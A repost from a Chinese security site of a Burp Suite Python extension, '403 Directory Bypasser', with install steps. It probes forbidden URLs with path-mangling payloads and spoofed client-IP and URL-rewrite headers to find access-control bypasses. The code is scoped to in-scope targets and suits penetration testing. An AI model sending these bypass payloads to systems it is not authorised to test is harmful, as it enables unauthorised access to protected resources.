
BurpSuite之403绕过插件(403Bypass)

2020-11-26 10:06

BurpSuite之403绕过插件(403Bypass)-极度安全

Payloads

温馨提示:终身会员登陆后查看

插件安装

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish（加载 Python 扩展需先在 Extender -> Options -> Python Environment 中配置 Jython 独立 JAR；注意该插件会对扫描器看到的每一个 403 响应额外发出约 20 个探测请求，包括伪造客户端 IP 的请求头，加载前请先确认目标已加入 Scope）

403bypasser.py

  1. from burp import IBurpExtender
  2. from burp import IScannerCheck
  3. from burp import IScanIssue
  4. from java.io import PrintWriter
  5. from array import array
  6. import re
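class BurpExtender(IBurpExtender, IScannerCheck):
    """Burp scanner check that probes 403 responses for common access-control bypasses.

    For every scanned response with status 403 the original request is re-sent
    with (a) path-mangling payloads (``%2e/``, ``..;/``, trailing ``/``, ``?``,
    ``//``, ...) and (b) headers that misconfigured front-ends sometimes trust
    for IP allow-listing or URL rewriting (``X-Forwarded-For: 127.0.0.1``,
    ``X-Original-URL``, ...). Every variant answered with status 200 is listed
    in a single "403 Bypass Vuln" issue.

    Operator notes:

    * The probes are live requests (about twenty per 403) issued from
      ``doPassiveScan``, whose Burp API contract is to inspect traffic only,
      not to send it. The check therefore refuses to run on URLs outside the
      suite scope; register it as an active check if this is still too noisy.
    * A 200 is evidence, not proof: a catch-all route answers 200 for
      ``/.randomstring`` as well. The issue detail includes the response
      length so identical catch-all pages stand out; confirm every hit
      manually before reporting it.
    """

    def registerExtenderCallbacks(self, callbacks):
        """Keep the callbacks/helpers, name the extension and register this scanner check."""
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("403 Directory Bypasser")
        # autoFlush=True so diagnostics appear in the Extender output tab immediately.
        self.stdout = PrintWriter(callbacks.getStdout(), True)
        self.stderr = PrintWriter(callbacks.getStderr(), True)
        callbacks.registerScannerCheck(self)

    def _get_matches(self, sttcode):
        """Return True when *sttcode* is the 403 status this check reacts to.

        The name is inherited from Burp's grep-based check template; only the
        status code is inspected here.
        """
        return sttcode == 403

    def rplHeader(self, headerStr, headerName, newHeader):
        """Replace the whole ``headerName: value`` line of raw request *headerStr* with *newHeader*.

        Matching is case-insensitive and anchored at a line start. The match
        stops before the line terminator so the CRLF is kept intact (the
        previous ``.*?$`` in MULTILINE mode also consumed the ``\\r``, leaving
        a bare-LF line in the outgoing request). *headerName* is regex-escaped
        and *newHeader* is inserted literally, so neither is interpreted as a
        pattern or as a backreference.
        """
        pattern = r'^' + re.escape(headerName) + r':[^\r\n]*'
        return re.sub(pattern, lambda _match: newHeader, headerStr, flags=re.I | re.M)

    def _has_header(self, raw_request, header_name):
        """Return True if *raw_request* already carries *header_name* (case-insensitive, line-anchored)."""
        pattern = r'^' + re.escape(header_name) + r':'
        return re.search(pattern, raw_request, re.I | re.M) is not None

    def _rewrite_path(self, raw_request, old_path, new_path):
        """Return *raw_request* with *old_path* swapped for *new_path* in the request line only.

        A whole-request ``replace`` would also touch ``HTTP/1.1``, the Host or
        Referer headers and the body; for a path of ``/`` it rewrote every
        slash in the message.
        """
        request_line, sep, rest = raw_request.partition("\r\n")
        return request_line.replace(old_path, new_path, 1) + sep + rest

    def _insert_header(self, raw_request, header_line):
        """Return *raw_request* with *header_line* added directly after the request line.

        Anchoring on the request line works for every request; the previous
        approach of splicing before ``User-Agent:`` silently sent the
        unmodified request when that header was absent.
        """
        request_line, sep, rest = raw_request.partition("\r\n")
        return request_line + sep + header_line + "\r\n" + rest

    def _probe(self, baseRequestResponse, raw_request):
        """Send *raw_request* to the base request's service.

        Returns the IHttpRequestResponse, or None when no response came back
        (connection failure), so callers never dereference a null response.
        """
        check = self._callbacks.makeHttpRequest(
            baseRequestResponse.getHttpService(),
            self._helpers.stringToBytes(raw_request))
        if check is None or check.getResponse() is None:
            return None
        return check

    def doPassiveScan(self, baseRequestResponse):
        """Probe a 403 response for bypasses.

        Returns a one-element list holding a CustomScanIssue when at least one
        payload was answered with 200, otherwise None. Nothing is sent when the
        base response is missing, is not a 403, or its URL is out of scope.
        """
        base_response = baseRequestResponse.getResponse()
        if base_response is None:
            return None
        if not self._get_matches(self._helpers.analyzeResponse(base_response).getStatusCode()):
            return None

        request_info = self._helpers.analyzeRequest(baseRequestResponse)
        url = request_info.getUrl()
        # Bypass payloads (spoofed client-IP headers included) must only go to
        # hosts the tester has deliberately put in scope.
        if not self._callbacks.isInScope(url):
            return None

        old_req = self._helpers.bytesToString(baseRequestResponse.getRequest())
        # java.net.URL.getPath() is "" for a bare host; treat that as the root.
        path = url.getPath() or "/"
        if path != "/":
            path = path.rstrip("/")
        segments = path.split('/')
        parent = '/'.join(segments[:-1])
        last = segments[-1]
        self.stdout.println("Scanning: " + path)
        self.stdout.println(request_info.getHeaders())

        # Path-mangling variants; each one replaces the last path segment.
        # (The original list lost commas between some entries, so adjacent
        # literals were fused into single, meaningless payloads.)
        url_payloads = [
            "%2e/" + last,
            last + "/.",
            "./" + last + "/./",
            last + "%20/",
            "%20" + last + "%20/",
            last + "..;/",
            last + "?",
            last + "??",
            "/" + last + "//",
            last + "/",
            last + "/.randomstring",
        ]
        # Headers a misconfigured proxy or framework may trust. The URL-rewrite
        # headers carry the full forbidden path, not just its last segment.
        # NOTE(review): the request line still targets the forbidden path, so a
        # hit here means the server honoured the header outright; the usual
        # "request an allowed path + name the forbidden one in the header"
        # variant is not exercised by this check.
        header_payloads = [
            "X-Rewrite-URL: " + path,
            "X-Original-URL: " + path,
            "Referer: " + path,
            "X-Custom-IP-Authorization: 127.0.0.1",
            "X-Originating-IP: 127.0.0.1",
            "X-Forwarded-For: 127.0.0.1",
            "X-Remote-IP: 127.0.0.1",
            "X-Client-IP: 127.0.0.1",
            "X-Host: 127.0.0.1",
            "X-Forwarded-Host: 127.0.0.1",
        ]

        results = []
        # Evidence shown in the issue: the base 403 plus every successful probe.
        evidence = [self._callbacks.applyMarkers(baseRequestResponse, None, None)]

        for payload in url_payloads:
            new_req = self._rewrite_path(old_req, path, parent + "/" + payload)
            probe = self._probe(baseRequestResponse, new_req)
            if probe is None:
                continue
            status = self._helpers.analyzeResponse(probe.getResponse()).getStatusCode()
            if status == 200:
                results.append("Url payload: " + self._helpers.analyzeRequest(probe).getUrl().getPath()
                               + " | Status code: " + str(status)
                               + " | Response length: " + str(len(probe.getResponse())))
                evidence.append(probe)

        for header in header_payloads:
            if header.startswith("Referer:") and self._has_header(old_req, "Referer"):
                new_req = self.rplHeader(old_req, "Referer", header)
            else:
                new_req = self._insert_header(old_req, header)
            probe = self._probe(baseRequestResponse, new_req)
            if probe is None:
                continue
            status = self._helpers.analyzeResponse(probe.getResponse()).getStatusCode()
            if status == 200:
                results.append("Header payload: " + header
                               + " | Status code: " + str(status)
                               + " | Response length: " + str(len(probe.getResponse())))
                evidence.append(probe)

        if not results:
            return None
        return [CustomScanIssue(
            baseRequestResponse.getHttpService(),
            url,
            evidence,
            "403 Bypass Vuln",
            '<br>'.join(results),
            "High")]

    def consolidateDuplicateIssues(self, existingIssue, newIssue):
        """Tell Burp how to merge issues this check raised for the same URL path.

        Returns -1 (keep only the existing issue) when both issues carry the
        same URL, otherwise 0 (report both). Only the URL is compared: every
        issue from this check is named "403 Bypass Vuln", so the name cannot
        tell them apart.
        """
        if existingIssue.getUrl() == newIssue.getUrl():
            return -1
        return 0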
#
# class implementing IScanIssue to hold our custom scan issue details
#
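class CustomScanIssue(IScanIssue):
    """Plain IScanIssue carrier for the "403 Bypass Vuln" finding.

    Stores the values Burp reads back through the IScanIssue getters. The
    background and remediation texts are intentionally empty (None).

    Args:
        httpService: IHttpService the issue applies to.
        url: java.net.URL of the forbidden resource.
        httpMessages: IHttpRequestResponse[] shown as evidence in the issue.
        name: Issue title.
        detail: HTML issue detail (one line per working payload).
        severity: One of Burp's severity strings ("High", "Medium", "Low",
            "Information").
        confidence: One of "Certain", "Firm", "Tentative". Defaults to
            "Certain" so existing six-argument callers keep working, but a
            200 after a path or header trick is heuristic evidence; callers
            are encouraged to pass "Tentative" or "Firm" and let the analyst
            confirm the bypass.
    """

    def __init__(self, httpService, url, httpMessages, name, detail, severity, confidence="Certain"):
        self._httpService = httpService
        self._url = url
        self._httpMessages = httpMessages
        self._name = name
        self._detail = detail
        self._severity = severity
        self._confidence = confidence

    def getUrl(self):
        return self._url

    def getIssueName(self):
        return self._name

    def getIssueType(self):
        # No built-in Burp issue type is associated with this extension-defined
        # issue (0, as in Burp's sample extension — verify against current IScanIssue docs).
        return 0

    def getSeverity(self):
        return self._severity

    def getConfidence(self):
        return self._confidence

    def getIssueBackground(self):
        return None

    def getRemediationBackground(self):
        return None

    def getIssueDetail(self):
        return self._detail

    def getRemediationDetail(self):
        return None

    def getHttpMessages(self):
        return self._httpMessages

    def getHttpService(self):
        return self._httpService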

知识来源: https://www.secvery.com/4160.html
